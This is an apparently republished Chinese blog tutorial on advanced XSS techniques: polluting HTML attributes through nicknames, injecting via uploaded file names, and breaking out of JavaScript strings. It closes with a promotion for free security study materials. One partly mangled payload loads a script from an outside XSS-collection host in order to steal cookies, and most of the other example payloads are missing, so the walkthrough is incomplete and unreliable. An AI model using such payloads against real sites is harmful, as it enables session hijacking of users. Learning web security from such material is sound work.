XSS漏洞是Web应用程序中最常见的漏洞之一,想要入门Web安全的小伙伴,这个知识点是必学的。
i春秋官网中有很多关于XSS漏洞的课程,新手小白可以去官网看课学习。
学习地址:https://www.ichunqiu.com/search/XSS漏洞
XSS是一种经常出现在Web应用中的计算机安全漏洞,也是客户端脚本安全的头号大敌。今天i春秋跟大家分享的是XSS漏洞的进阶篇,如何利用XSS漏洞的一些小技巧,希望对大家学习Web安全有所帮助。
污染标签
简单的说,XSS漏洞的本质就是输入与输出。
比如,我的QQ网名是:
“你的网名”>
结果就被污染成
这样的话我就成功弹窗了,但又有什么用呢?
我们可以构造语句:
<input value=“”#ff0000">http%3A%2F%2Fxssnow.com%2FdZJ4%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));">
这样我们就能成功打到cookie了。
文件名称XSS
有些网站有上传点,但是后台并未对文件名做更改。
比如上传以后前端代码是这样的:
1.rar假设就是我们上传的文件。
我们是不是又可以构造语句闭合或者污染标签,值得一提的是,你需要抓包改文件名(想在Windows环境下改,你去试试就知道是怎么回事了)
我们就改成:
">.rar
这样的话,就变成:
成功弹窗,如果过滤了尖括号 < >
就可以按照之前讲的标签污染法,让它执行我们的JS语句。
闭合JS
有时候,JS会调用我们网站的一些资料,类似昵称。
welcome sqler;
因为我们昵称是被包含在里,我们无法利用。
这样我们就需要为它打开一个新大门。
这样我们就成功弹窗。
以上就是今天要分享的内容,是不是很简单。
XSS漏洞是Web安全入门必掌握的知识点,当然还有CSRF漏洞、Webshell与文件上传漏洞、SQL注入等等,这些相对应的学习资料,我都有整理。
如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
一、网络安全(黑客)学习路线
网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网络安全教程视频
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。
三、网络安全CTF实战案例
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
四、网络安全面试题
最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。
网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。
机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!
这份完整版的学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
1585
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
